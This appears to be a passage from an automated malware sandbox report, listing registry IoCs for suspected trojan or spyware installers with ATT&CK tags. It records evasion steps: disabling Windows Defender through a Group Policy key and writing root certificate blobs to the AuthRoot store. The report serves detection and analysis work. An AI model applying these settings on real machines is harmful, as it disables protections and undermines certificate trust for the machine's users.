Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy Objects\{D6B524CD-BAA1-4B0D-83B5-BD1C469E79D3}Machine\SOFTWARE\Policies\Microsoft\Windows Defender	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy Objects	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy Objects\{D6B524CD-BAA1-4B0D-83B5-BD1C469E79D3}User	rundll32.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy Objects\{D6B524CD-BAA1-4B0D-83B5-BD1C469E79D3}Machine\SOFTWARE\Policies	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{D6B524CD-BAA1-4B0D-83B5-BD1C469E79D3}Machine	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy Objects\{D6B524CD-BAA1-4B0D-83B5-BD1C469E79D3}Machine\SOFTWARE	rundll32.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{D6B524CD-BAA1-4B0D-83B5-BD1C469E79D3}User	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	rundll32.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy Objects\{D6B524CD-BAA1-4B0D-83B5-BD1C469E79D3}Machine\SOFTWARE	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy Objects\{D6B524CD-BAA1-4B0D-83B5-BD1C469E79D3}Machine\SOFTWARE\Policies	rundll32.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy Objects\{D6B524CD-BAA1-4B0D-83B5-BD1C469E79D3}USER	rundll32.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy Objects	rundll32.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy Objects\{D6B524CD-BAA1-4B0D-83B5-BD1C469E79D3}Machine\SOFTWARE\Policies\Microsoft	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy Objects\{D6B524CD-BAA1-4B0D-83B5-BD1C469E79D3}Machine\SOFTWARE\Policies\Microsoft	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy Objects\{D6B524CD-BAA1-4B0D-83B5-BD1C469E79D3}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	rundll32.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy Objects\{D6B524CD-BAA1-4B0D-83B5-BD1C469E79D3}Machine	rundll32.exe

Modifies registry class 24 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\1 = ";"	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Clients = 3a0000000000	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Assignment = "1"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\ProductIcon = "C:\\Windows\\Installer\\{C845414C-903C-4218-9DE7-132AB97FDF62}\\logo.exe"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\InstanceType = "0"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\PackageName = "Windows Manager - Postback Yonatan.msi"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\DiskPrompt = "[1]"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C414548CC3098124D97E31A29BF7FD26\MainFeature	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\PackageCode = "2E72A6E77B6A70F46845C8932F3B3E32"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Language = "1033"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Version = "16777216"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\AdvertiseFlags = "388"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\AuthorizedLUAApp = "0"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C414548CC3098124D97E31A29BF7FD26	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\ProductName = "Windows Manager"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\DeploymentFlags = "3"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5785CBDF4ABB5AD409841A692AF14EA9	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5785CBDF4ABB5AD409841A692AF14EA9\C414548CC3098124D97E31A29BF7FD26	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList	msiexec.exe

Modifies system certificate store 2 TTPs 15 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	Laniriradi.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	askinstall39.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Laniriradi.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Laniriradi.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	gpooe.exe
